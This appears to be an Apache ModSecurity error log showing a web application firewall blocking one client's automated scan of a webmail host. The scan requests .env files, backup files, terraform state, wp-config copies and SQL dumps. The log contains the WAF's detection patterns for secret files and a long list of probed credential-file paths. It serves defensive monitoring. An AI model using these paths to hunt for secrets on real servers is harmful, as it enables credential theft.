[Tue May 26 13:32:26.170424 2026] [security2:error] [pid 512745:tid 512967] [client 45.148.10.95:7732] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/production/.env"] [unique_id "ahVTknKSB_s2CvZg7xN5pwAAAWY"]
[Tue May 26 13:32:26.194375 2026] [security2:error] [pid 512745:tid 512982] [client 45.148.10.95:7682] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/project/.env"] [unique_id "ahVTknKSB_s2CvZg7xN5qQAAAXU"]
[Tue May 26 13:32:26.201531 2026] [security2:error] [pid 512745:tid 512977] [client 45.148.10.95:7668] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/public/.env"] [unique_id "ahVTknKSB_s2CvZg7xN5qwAAAXA"]
[Tue May 26 13:32:26.201840 2026] [security2:error] [pid 512745:tid 512877] [client 45.148.10.95:7670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/public-api/.env"] [unique_id "ahVTknKSB_s2CvZg7xN5rAAAAQw"]
[Tue May 26 13:32:26.209099 2026] [security2:error] [pid 512745:tid 512916] [client 45.148.10.95:7718] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/public/phpinfo.php"] [unique_id "ahVTknKSB_s2CvZg7xN5rQAAATM"]
[Tue May 26 13:32:26.222716 2026] [security2:error] [pid 512745:tid 512938] [client 45.148.10.95:7636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/public_html/.env"] [unique_id "ahVTknKSB_s2CvZg7xN5rgAAAUk"]
[Tue May 26 13:32:26.250831 2026] [security2:error] [pid 512745:tid 512924] [client 45.148.10.95:7564] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/qa/.env"] [unique_id "ahVTknKSB_s2CvZg7xN5sAAAATs"]
[Tue May 26 13:32:26.333836 2026] [security2:error] [pid 512745:tid 512876] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTkXKSB_s2CvZg7xN5iQAAAQs"]
[Tue May 26 13:32:26.524013 2026] [security2:error] [pid 512745:tid 512891] [client 45.148.10.95:7698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/s3/.env.bak"] [unique_id "ahVTknKSB_s2CvZg7xN5ygAAARo"]
[Tue May 26 13:32:26.646156 2026] [security2:error] [pid 512745:tid 512971] [client 45.148.10.95:7764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/server/api/.env"] [unique_id "ahVTknKSB_s2CvZg7xN50wAAAWo"]
[Tue May 26 13:32:26.652848 2026] [security2:error] [pid 512745:tid 512963] [client 185.191.171.3:19796] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVTknKSB_s2CvZg7xN51QAAAWI"]
[Tue May 26 13:32:26.652988 2026] [security2:error] [pid 512745:tid 512963] [client 185.191.171.3:19796] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVTknKSB_s2CvZg7xN51QAAAWI"]
[Tue May 26 13:32:26.659441 2026] [security2:error] [pid 512745:tid 512947] [client 45.148.10.95:7514] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/server/backend/.env"] [unique_id "ahVTknKSB_s2CvZg7xN51gAAAVI"]
[Tue May 26 13:32:26.661725 2026] [security2:error] [pid 512344:tid 512582] [client 45.148.10.95:7632] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/server/.env"] [unique_id "ahVTksbElyei4S77DQcONAAAAGw"]
[Tue May 26 13:32:26.767483 2026] [security2:error] [pid 512745:tid 512882] [client 45.148.10.95:7670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/service/.env"] [unique_id "ahVTknKSB_s2CvZg7xN53wAAARE"]
[Tue May 26 13:32:26.772863 2026] [security2:error] [pid 512344:tid 512554] [client 45.148.10.95:7550] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/services/.env"] [unique_id "ahVTksbElyei4S77DQcOPQAAAFA"]
[Tue May 26 13:32:26.823979 2026] [security2:error] [pid 512344:tid 512506] [client 45.148.10.95:7494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/shared/.env"] [unique_id "ahVTksbElyei4S77DQcOPwAAACA"]
[Tue May 26 13:32:26.840590 2026] [security2:error] [pid 512745:tid 512939] [client 45.148.10.95:7526] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/shop/.env"] [unique_id "ahVTknKSB_s2CvZg7xN55QAAAUo"]
[Tue May 26 13:32:26.892643 2026] [security2:error] [pid 512745:tid 512934] [client 45.148.10.95:7712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/src/.env"] [unique_id "ahVTknKSB_s2CvZg7xN56gAAAUU"]
[Tue May 26 13:32:26.999713 2026] [security2:error] [pid 512745:tid 512955] [client 45.148.10.95:7652] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/srv/.env"] [unique_id "ahVTknKSB_s2CvZg7xN59wAAAVo"]
[Tue May 26 13:32:27.014274 2026] [security2:error] [pid 512745:tid 512886] [client 45.148.10.95:7740] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/stage/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN5-AAAARU"]
[Tue May 26 13:32:27.023204 2026] [security2:error] [pid 512745:tid 512964] [client 45.148.10.95:7682] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/staging/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN5-gAAAWM"]
[Tue May 26 13:32:27.057559 2026] [security2:error] [pid 512745:tid 512932] [client 45.148.10.95:7764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/stg/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN5_AAAAUM"]
[Tue May 26 13:32:27.123131 2026] [security2:error] [pid 512745:tid 512926] [client 45.148.10.95:7526] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/stripe/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6AQAAAT0"]
[Tue May 26 13:32:27.180350 2026] [security2:error] [pid 512745:tid 512935] [client 45.148.10.95:7670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/terraform.tfstate.backup"] [unique_id "ahVTk3KSB_s2CvZg7xN6BwAAAUY"]
[Tue May 26 13:32:27.213172 2026] [security2:error] [pid 512344:tid 512475] [client 45.148.10.95:7632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/test.php"] [unique_id "ahVTk8bElyei4S77DQcOTQAAAAE"]
[Tue May 26 13:32:27.226057 2026] [security2:error] [pid 512745:tid 512961] [client 45.148.10.95:7636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/test/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6DAAAAWA"]
[Tue May 26 13:32:27.276728 2026] [security2:error] [pid 512745:tid 512902] [client 45.148.10.95:7652] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/user/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6FAAAASU"]
[Tue May 26 13:32:27.294017 2026] [security2:error] [pid 512745:tid 512910] [client 45.148.10.95:7732] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/v1/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6FgAAAS0"]
[Tue May 26 13:32:27.297525 2026] [security2:error] [pid 512745:tid 512951] [client 45.148.10.95:7526] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/v2/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6GAAAAVY"]
[Tue May 26 13:32:27.310865 2026] [security2:error] [pid 512745:tid 512950] [client 45.148.10.95:7712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/v3/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6GgAAAVU"]
[Tue May 26 13:32:27.454356 2026] [security2:error] [pid 512745:tid 512878] [client 45.148.10.95:7670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/var/www/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6KAAAAQ0"]
[Tue May 26 13:32:27.461360 2026] [security2:error] [pid 512344:tid 512499] [client 45.148.10.95:7446] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/var/www/html/.env"] [unique_id "ahVTk8bElyei4S77DQcOWAAAABk"]
[Tue May 26 13:32:27.492043 2026] [security2:error] [pid 512745:tid 512995] [client 45.148.10.95:7800] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/web/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6KgAAAYI"]
[Tue May 26 13:32:27.608843 2026] [security2:error] [pid 512745:tid 512922] [client 45.148.10.95:7712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/website/.env"] [unique_id "ahVTk3KSB_s2CvZg7xN6OAAAATk"]
[Tue May 26 13:32:27.623481 2026] [security2:error] [pid 512745:tid 512991] [client 45.148.10.95:7800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-config.php"] [unique_id "ahVTk3KSB_s2CvZg7xN6OgAAAX4"]
[Tue May 26 13:32:27.630293 2026] [security2:error] [pid 512745:tid 512909] [client 45.148.10.95:7764] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-config.php.bak"] [unique_id "ahVTk3KSB_s2CvZg7xN6PAAAASw"]
[Tue May 26 13:32:27.652781 2026] [security2:error] [pid 512745:tid 512963] [client 45.148.10.95:7514] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-config.php.new"] [unique_id "ahVTk3KSB_s2CvZg7xN6PgAAAWI"]
[Tue May 26 13:32:27.664834 2026] [security2:error] [pid 512745:tid 512890] [client 45.148.10.95:7698] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-config.php.old"] [unique_id "ahVTk3KSB_s2CvZg7xN6PwAAARk"]
[Tue May 26 13:32:27.681241 2026] [security2:error] [pid 512745:tid 512907] [client 159.148.158.135:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVTknKSB_s2CvZg7xN59AAAASo"]
[Tue May 26 13:32:27.689507 2026] [security2:error] [pid 512344:tid 512512] [client 45.148.10.95:7494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/wp-content/mysql.sql"] [unique_id "ahVTk8bElyei4S77DQcOXQAAACY"]
